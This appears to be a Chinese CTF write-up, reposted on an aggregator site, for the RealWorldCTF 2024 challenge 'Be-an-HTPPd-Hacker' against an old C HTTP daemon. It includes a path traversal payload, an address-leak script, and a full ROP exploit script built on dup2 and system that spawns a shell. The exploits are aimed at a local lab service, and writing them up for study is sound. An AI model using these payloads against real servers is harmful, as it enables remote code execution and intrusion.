跟随realworldCTF,做一个http网络协议黑客

科技一颗大心心 2024-03-04 15:52:50
前言

本报告旨在对RealWorldCTF 2024体验赛中的Pwn方向题目——"Be-an-HTPPd-Hacker"进行深入解析和讲解。该题目涉及一个十一年前的项目,其基于C语言实现了HTTP协议。我们将通过对该协议进行栈溢出攻击,探索真实世界中的攻击手法,并从中学习更多有用的攻击技巧,以提升我们的安全水平。通过理解攻击原理和方法,我们能够更好地理解安全防御的重要性,并为未来的安全工作做好准备。本报告将详细介绍攻击过程,希望能为读者提供深入而有价值的学习体验。

搜索字符串,github找源码

从IDA中,shift+F12提取,得到字符串,在github进行搜索能够得到源码在这:

https://github.com/bnlf/httpd/blob/943cb06a09eb553096956b2e394b8366124e0aac/src/httpd.c

具体构造

构造的代码如下,也就是方法 地址 加协议:

method, uri, vProtocol

如 POST www.baidu.com xxx

源码如下:

request parseRequest(char buffer[]) { char *ptr = buffer; char method[MAXLINE], uri[MAXLINE], vProtocol[MAXLINE]; request req; sscanf(ptr, "%s %s %s", method, uri, vProtocol); // Somente GET ou POST if(strcasecmp(method, "GET") == 0) req.method = "GET"; else if (strcasecmp(method, "POST") == 0) req.method = "POST"; else { req.method = "INVALID"; req.vProtocol = "INVALID"; req.uri[0] = '\0'; return req; } // Sera testado futuramente. Por enquanto aceita que é um uri valido req.uri = uri; if(strcasecmp(vProtocol, "HTTP/1.0") == 0) req.vProtocol = "HTTP/1.0"; else if (strcasecmp(vProtocol, "HTTP/1.1") == 0) req.vProtocol = "HTTP/1.1"; else req.vProtocol = "HTTP/1.1"; // se nao especificado return req;}GET路径穿越

其中get请求,经过简单尝试和逆向发现存在路径穿越,其直接对WWW进行拼接读取。

else if (res.status == 200 ) // Ok { return sendFile(req, res,connfd); }

阅读源码发现如上。

路径穿越漏洞(Path Traversal Vulnerability)是一种常见的安全漏洞,通常发生在Web应用程序或文件系统中。它允许攻击者访问他们没有权限访问的文件或目录,通过修改文件路径来绕过应用程序的访问控制机制。

不过flag没有可读权限,只能通过readflag来执行。

from evilblade import *context(os='linux', arch='amd64')# context(os='linux', arch='amd64', log_level='debug')#GET /index.html HTTP/1.1setup('./pwn')libset('./libc.so.6')rsetup('127.0.0.1',33333)# rsetup('121.40.246.203',30594)# pause()payload = 'GET ' + '/img/../../../etc/profile HTTP/1.0\x00'# payload = b'POST /form-example.html/../img/../../../add HTTP/1.1\r\n'pause()sl(payload)ia()

这是路径穿越读/etc/profile。

POST栈溢出

其实不是源码也分析的差不多了,就是不太理解这个&=的分割,还有会存在一个奇怪的堆溢出,堆溢出主要是因为malloc大小引起的,在计算

char *line = (char*) malloc(end-start);

中,end出现小于start的情况。我们可以输入多个\n来使得heap足够大,避免溢出的情况。

代码可以看到:

int sendPostMessage(request req, response res, int connfd, char *linePost){ char buffer[MAXLINE]; //Prepara cabecalho HTML sprintf(buffer, "<html><head><title>Submitted Form</title></head>"); //Cria body strcat(buffer, "<body><h1>Received variables</h1><br><table>"); strcat(buffer, "<tr><th>Variables</th><th>Values</th></tr>"); char * pch; char temp[250]; pch = strtok (linePost,"&="); while (pch != NULL) { sprintf(temp, "<tr><td>%s</td>", pch); strcat(buffer, temp); pch = strtok (NULL, "&="); sprintf(temp, "<td>%s</td></tr>", pch); strcat(buffer, temp); pch = strtok (NULL, "&="); } //Fecha body e html strcat(buffer, "</table></body></html>"); sendHeader(connfd, req, res, "OK", "text/html"); write(connfd, buffer, strlen(buffer)); return 0;}

也就是会根据&或者=分割之后,进行连接到temp。

其中linepost如下:

void httpd(int connfd) { char buffer[MAXLINE]; // Buffer dos dados de input char fileBuffer[MAXLINE]; request req; // Pedido do cliente response res; // Resposta do servidor struct stat st; int n; int sizeContent = -1; // Le o que está vindo no socket n=read(connfd, buffer, MAXLINE); int i = strlen(buffer); char options[MAXLINE]; int statusRead = 0; strcpy(options, buffer); while(statusRead == 0) { if((options[i-3] == '\n' && options[i-1] == '\n') || options[i-1] != '\n') { statusRead = 1; } else { n=read(connfd, options, MAXLINE); //strcat(buffer, options); //printf("%s\n", buffer); i = strlen(options); if(options[0] == '\r' && options[1] == '\n' && n == 2) statusRead = 1; } } // Faz o parse da requisicao req = parseRequest(buffer); char *linePost; //Encontra no buffer o tamanho do conteudo if(strcmp(req.method, "POST") ==0) { linePost = getLastLineRead(buffer); } //……char *getLastLineRead(char *buffer) { int numLines = 0; int start = 0; int end = 0; int bufSize = strlen(buffer); int i = 0; int j = 0; for (i=0;i<bufSize;i++) { if (buffer[i]=='\n') { numLines++; } } int *vetPositionLine = (int*) malloc(numLines); for (i=0;i<bufSize;i++) { if (buffer[i]=='\n') { vetPositionLine[j] = i;//出现回车的地方 j++; } } start = vetPositionLine[numLines-3]; end = vetPositionLine[numLines-1]; char *line = (char*) malloc(end-start); strncpy(line,buffer+end,bufSize-end); return line;}

就是说当他会把\n处作为起始地址,然后把后面的内容复制到line,这样就可以泄漏地址了!

使用exp:

from evilblade import *context(os='linux', arch='amd64')setup('./pwn')libset('./libc.so.6')rsetup('127.0.0.1',33333)payload = b'POST '+ b'A'*3982 + b'\n'pause()sl(payload)ia()• 调试方法:执行exp后,用ps -ef | grep 'httpd'之后找到最新的进程用sudo gdb -p PID即可。

或者直接使用命令:sudo gdb -p $(pgrep -n -f './httpd 12345')

最后会从buf+你输入的数据长度,取一个数据写到heap中,下次取出来作参数。

主要对此处进行断点观察。

可以看到:

由此可以泄漏出libc甚至其他了。

使用脚本:

from evilblade import *context(os='linux', arch='amd64')setup('./pwn')libset('./libc.so.6')rsetup('127.0.0.1',33333)payload = b'POST '+ b'A'*3982 + b'\n'sl(payload)ru("Values</th></tr><tr><td>")stack = u32(rv(4))dx(stack)ld = u32(rv(4))-0xc0cdx(ld)libc = u32(rv(4))-2324400dx(libc)ia()

泄漏得到:

---------------your stack is >>> 0xff9c9f0a------------------------------your ld is >>> 0xedf40000------------------------------your libc is >>> 0xedcca000---------------构造ROP

从这个部分可以发现,会将原本的内容根据&=分割,然后加上之类的字符串,使得字符串长度变大,会导致栈溢出。那么我们根据前面得到的基地址,和这个部分漏洞进行ROP构造,从而getshell。

char * pch; char temp[250]; pch = strtok (linePost,"&=");while (pch != NULL){ sprintf(temp, "<tr><td>%s</td>", pch); strcat(buffer, temp); pch = strtok (NULL, "&="); sprintf(temp, "<td>%s</td></tr>", pch); strcat(buffer, temp); pch = strtok (NULL, "&=");}

做以下构造,经过多次尝试终于得到了控制返回地址为xxxx:

from evilblade import *context(os='linux', arch='amd64')setup('./pwn')libset('./libc.so.6')rsetup('127.0.0.1',33333)payload = b'POST '+ b'A='*1850#test= cyclic(0x700).decode()#modified_test = ''.join(['=' if (i) % 5 == 0 else test[i] for i in range(len(test))])#d(modified_test)payload = b'POST / A\n'+ b"A"*2400 + b"\n"payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv=acwa=cxaa=yaac=aadb=adca=ddaa=eaad=aadg=adha=diaa=jaad=aadl=adma=dnaa=oaad=aadq=adra=dsaa=taad=aadv=adwa=dxaa=yaad=aaeb=aeca=edaa=eaae=aaeg=aeha=eiaa=jaae=aael=aema=enaa=oaae=aaeq=aera=esaa=taae=aaev=aewa=exaa=yaae=aafb=afca=fdaa=eaaf=aafg=afha=fiaa=jaaf=aafl=afma=fnaa=oaaf=aafq=afra=fsaa=taaf=aafv=afwa=fxaa=yaaf=aagb=agca=gdaa=eaag=aagg=agha=giaa=jaag=aagl=agma=gnaa=oaag=aagq=agra=gsaa=taag=aagv=agwa=gxaa=yaag=aahb=ahca=hdaa=eaah=aahg=ahha=hiaa=jaah=aahl=ahma=hnaa=oaah=aahq=ahra=hsaa=taah=aahv=ahwa=hxaa=yaah=aaib=aica=idaa=eaai=aaig=aiha=iiaa=jaai=aail=aima=inaa=oaai=aaiq=aira=isaa=taai=aaiv=aiwa=ixaa=yaai=aajb=ajca=jdaa=eaaj=aajg=ajha=jiaa=jaaj=aajl=ajma=jnaa=oaaj=aajq=ajra=jsaa=taaj=aajv=ajwa=jxaa=yaaj=aakb=akca=kdaa=eaak=aakg=akha=kiaa=jaak=aakl=akma=knaa=oaak=aakq=akra=ksaa=taak=aakv=akwa=kxaa=yaak=aalb=alca=ldaa=eaal=aalg=pppp"payload += b"=" + p32(0xeb029050)*10+ b"xxxx" + b"="d(payload)dpx('len',len(payload))pause()sd(payload)

其中xxxx为任意地址,可以返回!

image-20240213222234157

由于 sprintf的原因,不能输入\x00和\n之类的作为rop,我这里采取加减法的方式进行绕过,先输入不包含0和0a的字符,后续根据加减恢复到我们需要的字符。

搜索有:

pwndbg> search -4 0x11111111Searching for value: b'\x11\x11\x11\x11'libc.so.6 0xf0ca28f4 0x11111111libc.so.6 0xf0ca2a08 0x11111111libc.so.6 0xf0ca2a0c 0x11111111计算得到:λ ~/ pythonPython 3.11.6 (main, Nov 14 2023, 09:36:21) [GCC 13.2.1 20230801] on linuxType "help", "copyright", "credits" or "license" for more information.>>> hex(0xf0ca28f4 -0xf0af1000)'0x1b18f4'#这是libc偏移>>> hex(0x100000000-0x11111111)'0xeeeeeeef'>>>

那么我们用以上作为差值计算,其中0x11111111+0xeeeeeeef相加等于0。

构造的ROP如下:

push_esi = p32(libc+0x00061c0d) # push esi ; retnop_ret = p32(libc+0x0002fce8) # nop ; retread = p32(symoff("read",libc))pop_ebx = p32(0x0002c01f+libc) # pop ebx ; retadd_ebx = p32(0x001959c2 +libc)# add ebx, eax ; add eax, 2 ; ret)pop_eax = p32(libc+0x0002ed92)#: pop eax ; ret)add_ecx = p32(libc+0x000b4fd3) # : add ecx, dword ptr [ebx + 0x5f082444] ; ret)# dup2($ebx,$ecx)rop = pop_esi + dup22rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)rop += pop_ecx_eax + p32(0xeeeeeeef)*2rop += add_ecx #$ecx = 0rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)rop += add_ebx #$ebx = 4rop += push_esirop += pop_esi + dup22rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)rop += pop_ecx_eax + p32(0xeeeeeeef+0x1)*2rop += add_ecx #$ecx=1rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)rop += add_ebx #$ebx = 4rop += push_esirop += p32(symoff("system",libc)) + p32(0xdeadbef) + p32(libc+0x001bd0d5)if b"=" in rop or b"\x00" in rop: print("stop!") pause()payload = b'POST '+ b"A"*2400 + b"\n"payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv=acwa=cxaa=yaac=aadb=adca=ddaa=eaad=aadg=adha=diaa=jaad=aadl=adma=dnaa=oaad=aadq=adra=dsaa=taad=aadv=adwa=dxaa=yaad=aaeb=aeca=edaa=eaae=aaeg=aeha=eiaa=jaae=aael=aema=enaa=oaae=aaeq=aera=esaa=taae=aaev=aewa=exaa=yaae=aafb=afca=fdaa=eaaf=aafg=afha=fiaa=jaaf=aafl=afma=fnaa=oaaf=aafq=afra=fsaa=taaf=aafv=afwa=fxaa=yaaf=aagb=agca=gdaa=eaag=aagg=agha=giaa=jaag=aagl=agma=gnaa=oaag=aagq=agra=gsaa=taag=aagv=agwa=gxaa=yaag=aahb=ahca=hdaa=eaah=aahg=ahha=hiaa=jaah=aahl=ahma=hnaa=oaah=aahq=ahra=hsaa=taah=aahv=ahwa=hxaa=yaah=aaib=aica=idaa=eaai=aaig=aiha=iiaa=jaai=aail=aima=inaa=oaai=aaiq=aira=isaa=taai=aaiv=aiwa=ixaa=yaai=aajb=ajca=jdaa=eaaj=aajg=ajha=jiaa=jaaj=aajl=ajma=jnaa=oaaj=aajq=ajra=jsaa=taaj=aajv=ajwa=jxaa=yaaj=aakb=akca=kdaa=eaak=aakg=akha=kiaa=jaak=aakl=akma=knaa=oaak=aakq=akra=ksaa=taak=aakv=akwa=kxaa=yaak=aalb=alca=ldaa=eaal=aalg=pppp"payload += b"=" + (nop_ret)*10payload += roppayload += b"="

完整exp如下:

from evilblade import *context(os='linux', arch='amd64')setup('./pwn')libset('./libc.so.6')rsetup('127.0.0.1',33333)payload = b'POST '+ b'A'*3982 + b'\n'sl(payload)ru("Values</th></tr><tr><td>")stack = u32(rv(4))-0x1ed0adx(stack)ld = u32(rv(4))-0xc0cdx(ld)libc = u32(rv(4))-2324400dx(libc)close()rsetup('127.0.0.1',33333)payload = b'POST '+ b'A='*1850 #test= cyclic(0x700).decode()#modified_test = ''.join(['=' if (i) % 5 == 0 else test[i] for i in range(len(test))])#d(modified_test)sub_eax_ecx = p32(libc + 0x0018b0f8) # sub eax, ecx ; retpush_eax = p32(libc + 0x00036a7d) # push eax ; retpop_ecx_eax = p32(libc + 0x001280f4) # pop ecx ; pop eax ; retdup22 = p32(symoff("dup2",libc)+0xe)push_edx = p32(libc+0x00192ac8) # push edx ; ret pop_edx = p32(libc+0x00037375) # pop edx ; retpop_esi = p32(libc+0x00021479) # pop esi ; retpush_esi = p32(libc+0x00061c0d) # push esi ; retnop_ret = p32(libc+0x0002fce8) # nop ; retread = p32(symoff("read",libc))pop_ebx = p32(0x0002c01f+libc) # pop ebx ; retadd_ebx = p32(0x001959c2 +libc)# add ebx, eax ; add eax, 2 ; ret)pop_eax = p32(libc+0x0002ed92)#: pop eax ; ret)add_ecx = p32(libc+0x000b4fd3) # : add ecx, dword ptr [ebx + 0x5f082444] ; ret)# dup2($ebx,$ecx)rop = pop_esi + dup22rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)rop += pop_ecx_eax + p32(0xeeeeeeef)*2rop += add_ecx #$ecx = 0rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)rop += add_ebx #$ebx = 4rop += push_esirop += pop_esi + dup22rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)rop += pop_ecx_eax + p32(0xeeeeeeef+0x1)*2rop += add_ecx #$ecx=1rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)rop += add_ebx #$ebx = 4rop += push_esirop += p32(symoff("system",libc)) + p32(0xdeadbef) + p32(libc+0x001bd0d5)if b"=" in rop or b"\x00" in rop: print("stop!") pause()payload = b'POST '+ b"A"*2400 + b"\n"payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv=acwa=cxaa=yaac=aadb=adca=ddaa=eaad=aadg=adha=diaa=jaad=aadl=adma=dnaa=oaad=aadq=adra=dsaa=taad=aadv=adwa=dxaa=yaad=aaeb=aeca=edaa=eaae=aaeg=aeha=eiaa=jaae=aael=aema=enaa=oaae=aaeq=aera=esaa=taae=aaev=aewa=exaa=yaae=aafb=afca=fdaa=eaaf=aafg=afha=fiaa=jaaf=aafl=afma=fnaa=oaaf=aafq=afra=fsaa=taaf=aafv=afwa=fxaa=yaaf=aagb=agca=gdaa=eaag=aagg=agha=giaa=jaag=aagl=agma=gnaa=oaag=aagq=agra=gsaa=taag=aagv=agwa=gxaa=yaag=aahb=ahca=hdaa=eaah=aahg=ahha=hiaa=jaah=aahl=ahma=hnaa=oaah=aahq=ahra=hsaa=taah=aahv=ahwa=hxaa=yaah=aaib=aica=idaa=eaai=aaig=aiha=iiaa=jaai=aail=aima=inaa=oaai=aaiq=aira=isaa=taai=aaiv=aiwa=ixaa=yaai=aajb=ajca=jdaa=eaaj=aajg=ajha=jiaa=jaaj=aajl=ajma=jnaa=oaaj=aajq=ajra=jsaa=taaj=aajv=ajwa=jxaa=yaaj=aakb=akca=kdaa=eaak=aakg=akha=kiaa=jaak=aakl=akma=knaa=oaak=aakq=akra=ksaa=taak=aakv=akwa=kxaa=yaak=aalb=alca=ldaa=eaal=aalg=pppp"payload += b"=" + (nop_ret)*10payload += roppayload += b"="d(payload)dpx('len',len(payload))dpx("begin",uu64(pop_esi))dpx("nop",uu64(nop_ret))dx(stack)pause()sd(payload)ia()

攻击结果:

0 阅读:0

科技一颗大心心

简介:感谢大家的关注

作者最新文章
科技TOP
科技最新文章
热门分类
军事 NBA 体育 社会 明星八卦 娱乐 财经 科技 汽车 历史 国际 游戏 动漫 公益 搞笑 商业 互联网 数码 国际足球 健康 房产 家居 电影 星座 旅游 健身 时尚 科学探索 职场 育儿 股票 教育 影视 情感 热点

© CopyRight 2010-2024 玩酷网(www.wanbiaoku.com)

粤ICP备2022087075号-2 邮箱:181046773#qq.com

声明:部分文章摘自互联网,如有侵权,麻烦告知删除。